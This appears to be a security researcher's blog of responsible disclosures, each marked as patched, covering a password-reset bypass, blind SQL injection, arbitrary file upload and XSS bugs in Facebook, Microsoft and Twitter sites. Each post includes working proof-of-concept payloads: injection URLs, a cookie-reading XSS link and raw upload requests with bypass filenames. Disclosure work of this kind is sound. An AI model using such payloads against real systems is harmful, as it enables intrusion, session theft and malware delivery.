Monday, January 7, 2013

Facebook Bug #4: Password Reset Vulnerability Found in www.facebook.com

Description
Sow Ching Shiong, an independent vulnerability researcher has discovered a Password Reset vulnerability in www.facebook.com, which can be exploited by an attacker to bypass certain security restrictions.

In normal circumstances, an authenticated Facebook user is required to enter his/her current password on the change password page to prevent an unauthorized person from changing the password without the user's knowledge.

However, an attacker can change/reset a user's password without knowing the user's current password by accessing this URL directly: https://www.facebook.com/hacked.
After that, the page will be redirected to https://www.facebook.com/checkpoint/checkpointme?f=[userid]&r=web_hacked
Now, the attacker can click "Continue" to change/reset the user's password.

Proof of concept
Step 1: Logon to Facebook and access this URL directly: https://www.facebook.com/hacked. The page will be redirected to https://www.facebook.com/checkpoint/checkpointme?f=[userid]&r=web_hacked


Step 2: Click on "Continue" to proceed


Step 3: Enter "New Password" and "Confirm Password" to change/reset the password.


Conclusion
This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.

Facebook White Hat

https://www.facebook.com/whitehat

Thursday, July 12, 2012

Microsoft Bug #2: Blind SQL Injection Vulnerability Found in careers.microsoft.com

Description
Sow Ching Shiong, an independent vulnerability researcher has discovered a Blind SQL Injection vulnerability in careers.microsoft.com, which can be exploited by an attacker to conduct Blind SQL injection attacks.

Proof of concept URLs which will cause a time delay of 25 seconds are provided below:
  • http://careers.microsoft.com/Feed/Search.ashx?ss=xss&jc=all&pr=all&dv=1));WAITFOR DELAY '0:0:25'--&ct=all&rg=all&lang=en
  • http://careers.microsoft.com/Feed/Search.ashx?ss=xss&jc=all&pr=1));WAITFOR DELAY '0:0:25'--&dv=all&ct=all&rg=all&lang=en
  • https://careers.microsoft.com/search.aspx?ss=xss&jc=all&pr=all&dv=1));WAITFOR DELAY '0:0:25'--&ct=all&rg=all&lang=en
  • https://careers.microsoft.com/search.aspx?ss=xss&jc=all&pr=1));WAITFOR DELAY '0:0:25'--&dv=all&ct=all&rg=all&lang=en


Conclusion
This vulnerability has been confirmed and patched by Microsoft Security Team. I would like to thank them for their quick response to my report.

Microsoft White Hat

http://technet.microsoft.com/en-us/security/cc308575

Friday, May 11, 2012

Facebook Bug #3: Arbitrary File Upload Vulnerability Found in attachments.facebook.com

Description
Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.

Proof of concept
HTTP Request
===========
POST /ajax/messaging/upload.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7db2e171a0068
Accept-Encoding: gzip, deflate
Host: attachments.facebook.com
Content-Length: 194182
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: [information removed]

-----------------------------7db2e171a0068
Content-Disposition: form-data; name="post_form_id"

[information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="fb_dtsg"

[information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="id"

[information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="attachment"; filename="..exe"
Content-Type: application/octet-stream


Conclusion
This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.

Facebook White Hat

https://www.facebook.com/whitehat

Thursday, May 3, 2012

Facebook Bug #2: Arbitrary File Upload Vulnerability Found in attachments.facebook.com

Description
Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.

Proof of concept
HTTP Request
===========
POST /ajax/messaging/upload.php HTTP/1.1
Host: attachments.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
DNT: 1
Proxy-Connection: keep-alive
Cookie: [information removed]
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: 194200

-----------------------------265001916915724
Content-Disposition: form-data; name="post_form_id"

[information removed]
-----------------------------265001916915724
Content-Disposition: form-data; name="fb_dtsg"

[information removed]
-----------------------------265001916915724
Content-Disposition: form-data; name="id"

[information removed]
-----------------------------265001916915724
Content-Disposition: form-data; name="attachment"; filename="notepad.exe."
Content-Type: application/octet-stream


Conclusion
This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.

Facebook White Hat

https://www.facebook.com/whitehat

Microsoft Bug #1: Cross-Site Scripting (XSS) Found in connect.microsoft.com

Description
Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in connect.microsoft.com, which can be exploited by an attacker to conduct XSS attacks.

Proof of concept
Tested in IE9 with XSS filter enabled
============================
http://connect.microsoft.com/sqlserver/searchresults.aspx?UserHandle=%2522%253E%2527%253E%253Cscript%2520%253Ealert%2528/XSS by Sow Ching Shiong/%2529%253B%253C%252Fscript%2520%253E



Conclusion
This vulnerability has been confirmed and patched by Microsoft Security Team. I would like to thank them for their quick response to my report.

Microsoft White Hat

http://technet.microsoft.com/en-us/security/cc308575

Facebook Bug #1: Arbitrary File Upload Vulnerability Found in attachments.facebook.com

Description
Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.

Proof of concept
HTTP Request
===========
POST /ajax/messaging/upload.php HTTP/1.1
Host: attachments.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
DNT: 1
Proxy-Connection: keep-alive
Cookie: [information removed]
Content-Type: multipart/form-data; boundary=---------------------------4827543632391
Content-Length: 194188

-----------------------------4827543632391
Content-Disposition: form-data; name="post_form_id"

[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="fb_dtsg"

[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="id"

[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="attachment"; filename="notepad.EXE"
Content-Type: application/octet-stream


Conclusion
This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.

Facebook White Hat

https://www.facebook.com/whitehat

Sunday, April 29, 2012

Twitter Bug #1: Cross-Site Scripting (XSS) Found in twitter.com

Description
Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in twitter.com, which can be exploited by an attacker to conduct XSS attacks.

Proof of concept
https://twitter.com/intent/follow?original_referer=javascript:alert(document.cookie);&region=follow_link&screen_name=twitterapi&source=followbutton&variant=2.0


Conclusion
This vulnerability has been confirmed and patched by Twitter Security Team. I would like to thank them for their quick response to my report.

Twitter White Hat

https://twitter.com/about/security